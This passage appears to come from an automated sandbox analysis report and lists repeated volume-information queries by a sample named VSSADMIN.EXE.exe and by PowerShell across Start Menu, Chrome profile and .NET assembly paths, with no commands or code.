              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
